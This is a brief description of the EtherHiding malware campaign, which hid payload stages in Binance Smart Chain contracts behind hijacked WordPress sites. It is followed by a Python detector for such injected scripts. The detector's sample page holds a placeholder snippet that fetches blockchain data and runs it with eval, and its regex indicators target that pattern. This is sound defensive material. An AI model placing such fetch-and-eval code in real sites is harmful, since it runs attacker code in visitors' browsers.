“EtherHiding” introduces a new method of distributing malicious code: the attackers use Binance Smart Chain contracts to host parts of the code chain, taking advantage of the decentralized nature of blockchain technology. The attacker initially used hijacked WordPress sites to deceive users into downloading fake browser updates, but shifted to the blockchain after that infrastructure was taken down. The new campaign is more difficult to detect and take down.
In the attack, a compromised WordPress site is defaced, and concealed JavaScript is injected into article pages; this script retrieves a second-stage payload from a server controlled by the attackers. The attackers can remotely modify the infection process and display any message they want without having to access the compromised WordPress sites again. The new variant of the attack leverages Binance-controlled servers, which are hosted on the Binance Smart Chain (BSC). BSC is a decentralized blockchain owned by Binance and is used to run decentralized apps and smart contracts. By hosting the malicious code on the blockchain, the attackers make it difficult to block or take down.
The malicious code interacts with the blockchain by querying a contract to retrieve a payload, which is then evaluated and executed in the user’s browser. The payload includes the second-stage domain address, which is used to obtain a further payload for execution. The attack flow involves multiple domains and IP addresses, and the attackers frequently update the chain to swap out the malicious code and affiliated domains. The ultimate goal of the attack is to deface the compromised site with a deceptive overlay page.
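A defender-side heuristic for the pattern described above, added here as an example and not code from the original article: it scans a page's inline scripts for a blockchain RPC read combined with dynamic code execution, which is the shape of the injected EtherHiding script. The sample page, RPC endpoint and contract address are constructed placeholders.

```python
import re
from dataclasses import dataclass, field

# Indicator classes for the pattern described above: injected JavaScript that
# reads data from a blockchain RPC endpoint and hands the result to a code evaluator.
INDICATORS = {
    "rpc_read": re.compile(r"\beth_call\b|\beth_getStorageAt\b|JsonRpcProvider|\.Contract\("),
    "dyn_exec": re.compile(r"\beval\s*\(|new\s+Function\s*\(|\.innerHTML\s*=|document\.write\s*\("),
    "decode":   re.compile(r"\batob\s*\(|fromCharCode|toUtf8String|parseBytes32String"),
}
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

@dataclass
class Finding:
    index: int                     # position of the <script> block in the page
    hits: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A blockchain read plus dynamic execution in one inline script is the
        # EtherHiding shape; decoding alone is common in benign code.
        return "rpc_read" in self.hits and "dyn_exec" in self.hits

def classify_script(src: str) -> list[str]:
    """Return the names of all indicator classes matched by one script body."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]

def scan_html(html: str) -> list[Finding]:
    """Return one Finding per inline script that matches at least one indicator."""
    findings = []
    for i, m in enumerate(SCRIPT_RE.finditer(html)):
        hits = classify_script(m.group(1))
        if hits:
            findings.append(Finding(i, hits))
    return findings

# Constructed sample page: one benign theme script, then one injected script in
# the shape described above (placeholders, not a live endpoint or contract).
SAMPLE_HTML = """
<script>document.querySelectorAll('.gallery').forEach(g => g.classList.add('ready'));</script>
<article>post body</article>
<script>
fetch("https://RPC_ENDPOINT_PLACEHOLDER", {method: "POST",
  body: JSON.stringify({jsonrpc: "2.0", method: "eth_call", id: 1,
    params: [{to: "0xCONTRACT_PLACEHOLDER", data: "0x00"}, "latest"]})})
  .then(r => r.json()).then(j => eval(atob(j.result)));
</script>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"script #{f.index}: {f.hits} suspicious={f.suspicious}")
```

Run it over the rendered HTML of each article page (or the stored post content) rather than the theme files alone, since the injection described above lands in article pages.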